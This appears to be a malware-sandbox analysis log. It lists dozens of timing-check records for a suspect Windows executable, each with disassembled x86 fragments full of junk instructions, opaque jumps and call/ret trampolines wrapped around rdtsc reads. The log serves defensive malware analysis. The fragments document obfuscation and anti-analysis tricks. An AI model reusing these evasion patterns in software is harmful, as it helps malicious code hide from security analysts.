Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8BE second address: A5D8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8C2 second address: A5D8DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007FDC0050BD46h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8DB second address: A5D8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8E1 second address: A5D8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8E5 second address: A5D914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007FDC00CE27BDh 0x00000010 jmp 00007FDC00CE27B7h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA21 second address: A5DA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA2B second address: A5DA72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dl, 00000041h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 jl 00007FDC00CE27AAh 0x0000001a pop edi 0x0000001b call 00007FDC00CE27A9h 0x00000020 pushad 0x00000021 push edx 0x00000022 jl 00007FDC00CE27A6h 0x00000028 pop edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA72 second address: A5DAC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FDC0050BD55h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FDC0050BD54h 0x0000001e ja 00007FDC0050BD46h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDC0050BD4Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAC4 second address: A5DAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAC8 second address: A5DAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e jo 00007FDC0050BD4Ch 0x00000014 je 00007FDC0050BD46h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jbe 00007FDC0050BD46h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAF1 second address: A5DAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAF7 second address: A5DAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAFB second address: A5DB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push 00000003h 0x0000000e mov edx, dword ptr [ebp+129E2BB1h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 pop ecx 0x00000018 push 00000003h 0x0000001a mov edx, esi 0x0000001c call 00007FDC00CE27A9h 0x00000021 pushad 0x00000022 jno 00007FDC00CE27A8h 0x00000028 pushad 0x00000029 jmp 00007FDC00CE27AEh 0x0000002e push esi 0x0000002f pop esi 0x00000030 popad 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FDC00CE27ABh 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d jno 00007FDC00CE27ACh 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DB6C second address: A5DBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD50h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FDC0050BD56h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DBA4 second address: A5DBFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+12B6747Ch] 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FDC00CE27A8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a movzx esi, ax 0x0000002d mov cx, di 0x00000030 xchg eax, ebx 0x00000031 push edi 0x00000032 jmp 00007FDC00CE27ACh 0x00000037 pop edi 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DBFB second address: A5DBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A6F69E second address: A6F6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7BFD4 second address: A7BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7BFD8 second address: A7BFED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C184 second address: A7C18A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C18A second address: A7C199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FDC00CE27A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C307 second address: A7C30B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C455 second address: A7C45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C5EA second address: A7C5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C78A second address: A7C792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C792 second address: A7C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C796 second address: A7C7A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7CD4F second address: A7CD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7CD53 second address: A7CD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A72BAC second address: A72BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A72BB0 second address: A72BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C299 second address: A4C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C29F second address: A4C2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C2A3 second address: A4C2AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C2AD second address: A4C2BA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC00CE27A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0A3 second address: A7D0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FDC0050BD46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0B3 second address: A7D0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0B7 second address: A7D0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DAEE second address: A7DAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DAF2 second address: A7DB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDC0050BD57h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DDE3 second address: A7DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A84412 second address: A8441D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A47476 second address: A4747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4747A second address: A47490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897A9 second address: A897C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDC00CE27A6h 0x0000000a jmp 00007FDC00CE27B0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897C3 second address: A897C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897C7 second address: A897E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FDC00CE27AAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4A8D4 second address: A4A8E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDC0050BD4Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A88D4C second address: A88D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FDC00CE27A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8931F second address: A89327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B1C0 second address: A8B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 3944E506h 0x0000000c cld 0x0000000d push 781F51C9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B605 second address: A8B61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B61C second address: A8B622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B7EB second address: A8B7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDC3 second address: A8BDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDC8 second address: A8BDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FDC0050BD46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDDD second address: A8BDF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDF4 second address: A8BDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BF41 second address: A8BF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C37A second address: A8C380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C380 second address: A8C392 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C392 second address: A8C396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E223 second address: A8E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E227 second address: A8E235 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDC0050BD4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8D9D6 second address: A8D9FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FDC00CE27A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007FDC00CE27B6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E235 second address: A8E241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8D9FF second address: A8DA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E241 second address: A8E2E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FDC0050BD48h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub edi, 6800C7F3h 0x0000002a push 00000000h 0x0000002c or esi, dword ptr [ebp+129E1E66h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FDC0050BD48h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e call 00007FDC0050BD55h 0x00000053 jbe 00007FDC0050BD4Ch 0x00000059 jp 00007FDC0050BD46h 0x0000005f pop esi 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FDC0050BD51h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8ED6E second address: A8EE13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jne 00007FDC00CE27A6h 0x00000010 jmp 00007FDC00CE27B9h 0x00000015 popad 0x00000016 jnp 00007FDC00CE27A8h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FDC00CE27A8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 adc esi, 6C92E0C3h 0x0000003e add si, 9E25h 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FDC00CE27A8h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov dword ptr [ebp+129E1BA5h], esi 0x00000065 push 00000000h 0x00000067 mov di, ax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FDC00CE27B3h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8EE13 second address: A8EE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E5C second address: A90E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E61 second address: A90E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E67 second address: A90E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E6B second address: A90E82 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FDC0050BD48h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E82 second address: A90F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+129E196Dh], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FDC00CE27A8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jmp 00007FDC00CE27AFh 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+129E2A85h] 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FDC00CE27B7h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jl 00007FDC00CE27A6h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F03 second address: A90F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F07 second address: A90F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F0D second address: A90F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A93B11 second address: A93B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
